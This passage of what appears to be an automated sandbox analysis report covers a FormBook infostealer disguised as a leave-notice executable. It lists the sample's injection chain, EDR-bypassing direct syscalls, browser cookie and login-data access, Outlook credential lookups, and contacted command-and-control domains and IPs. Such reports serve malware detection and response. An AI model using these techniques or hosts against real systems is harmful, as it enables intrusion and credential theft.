                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FBA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00FBA66C
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FA81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FA81AC
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FA8189 SetUnhandledExceptionFilter,0_2_00FA8189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\Utilman.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: NULL target: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: NULL target: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\Utilman.exeThread register set: target process: 5328Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\Utilman.exeThread APC queued: target process: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F8F008Jump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FBB106 LogonUserW,0_2_00FBB106
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F83D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F83D19
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC411C SendInput,keybd_event,0_2_00FC411C
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC74E7 mouse_event,0_2_00FC74E7
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe"Jump to behavior
                Source: C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exeProcess created: C:\Windows\SysWOW64\Utilman.exe "C:\Windows\SysWOW64\Utilman.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FBA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00FBA66C
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FC71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00FC71FA
                Source: eAdBvdCMNQkVZK.exe, 00000004.00000002.4580187512.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000000.2397595774.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583370273.00000000017A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: Mandatory Notice for all December Leave and Vacation application.exe, eAdBvdCMNQkVZK.exe, 00000004.00000002.4580187512.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000000.2397595774.0000000001A91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: eAdBvdCMNQkVZK.exe, 00000004.00000002.4580187512.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000000.2397595774.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583370273.00000000017A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: Mandatory Notice for all December Leave and Vacation application.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: eAdBvdCMNQkVZK.exe, 00000004.00000002.4580187512.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000000.2397595774.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583370273.00000000017A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FA65C4 cpuid 0_2_00FA65C4
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00FD091D
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FFB340 GetUserNameW,0_2_00FFB340
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FB1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00FB1E8E
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00F9DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F9DDC0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2516266335.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4579368467.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4580545569.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2513025295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4580597058.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2517323526.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4580892352.0000000005940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\Utilman.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Mandatory Notice for all December Leave and Vacation application.exeBinary or memory string: WIN_81
                Source: Mandatory Notice for all December Leave and Vacation application.exeBinary or memory string: WIN_XP
                Source: Mandatory Notice for all December Leave and Vacation application.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: Mandatory Notice for all December Leave and Vacation application.exeBinary or memory string: WIN_XPe
                Source: Mandatory Notice for all December Leave and Vacation application.exeBinary or memory string: WIN_VISTA
                Source: Mandatory Notice for all December Leave and Vacation application.exeBinary or memory string: WIN_7
                Source: Mandatory Notice for all December Leave and Vacation application.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2516266335.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4579368467.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4580545569.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2513025295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4580597058.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2517323526.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4580892352.0000000005940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00FD8C4F
                Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exeCode function: 0_2_00FD923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00FD923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		3
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		2
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560288 Sample: Mandatory Notice for all De... Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 28 www.tals.xyz 2->28 30 www.sipdontshoot.net 2->30 32 6 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 5 other signatures 2->50 10 Mandatory Notice for all December Leave and Vacation application.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 eAdBvdCMNQkVZK.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 Utilman.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 eAdBvdCMNQkVZK.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.sipdontshoot.net 216.40.34.41, 49985, 49986, 49987 TUCOWSCA Canada 22->34 36 www.hobbihub.info 209.74.77.108, 49993, 49994, 49995 MULTIBAND-NEWHOPEUS United States 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Mandatory Notice for all December Leave and Vacation application.exe37%ReversingLabsWin32.Trojan.AutoitInject
                Mandatory Notice for all December Leave and Vacation application.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://www.hover.com/domains/results0%Avira URL Cloudsafe
                https://www.hover.com/transfer_in?source=parked0%Avira URL Cloudsafe
                https://www.hover.com/email?source=parked0%Avira URL Cloudsafe
                https://www.hover.com/privacy?source=parked0%Avira URL Cloudsafe
                https://login.live.c0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/zr8v/0%Avira URL Cloudsafe
                https://www.hover.com/domain_pricing?source=parked0%Avira URL Cloudsafe
                https://www.hover.com/about?source=parked0%Avira URL Cloudsafe
                https://www.hover.com/renew?source=parked0%Avira URL Cloudsafe
                http://www.tals.xyz/stx5/0%Avira URL Cloudsafe
                http://www.sipdontshoot.net/ejy6/0%Avira URL Cloudsafe
                http://www.hobbihub.info/i5gf/0%Avira URL Cloudsafe
                http://www.conansog.shop/us5e/0%Avira URL Cloudsafe
                https://www.hover.com/tos?source=parked0%Avira URL Cloudsafe
                http://www.76kdd.top0%Avira URL Cloudsafe
                http://www.76kdd.top/6rpr/0%Avira URL Cloudsafe
                https://www.hover.com/?source=parked0%Avira URL Cloudsafe
                https://help.hover.com/home?source=parked0%Avira URL Cloudsafe
                https://www.hover.com/tools?source=parked0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.hobbihub.info
                		209.74.77.108
                		truetrue
                  		unknown
                  76kdd.top
                  		38.47.232.194
                  		truetrue
                    		unknown
                    www.conansog.shop
                    		104.21.41.74
                    		truetrue
                      		unknown
                      www.sipdontshoot.net
                      		216.40.34.41
                      		truetrue
                        		unknown
                        www.tals.xyz
                        		13.248.169.48
                        		truetrue
                          		unknown
                          www.rgenerousrs.store
                          		172.67.167.146
                          		truetrue
                            		unknown
                            www.7261ltajbc.bond
                            		154.12.28.184
                            		truetrue
                              		unknown
                              www.76kdd.top
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.rgenerousrs.store/zr8v/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.tals.xyz/stx5/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.hobbihub.info/i5gf/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.conansog.shop/us5e/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.76kdd.top/6rpr/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sipdontshoot.net/ejy6/true
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.hover.com/domain_pricing?source=parkedUtilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.hover.com/privacy?source=parkedUtilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/chrome_newtabUtilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://twitter.com/hoverUtilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                    		high
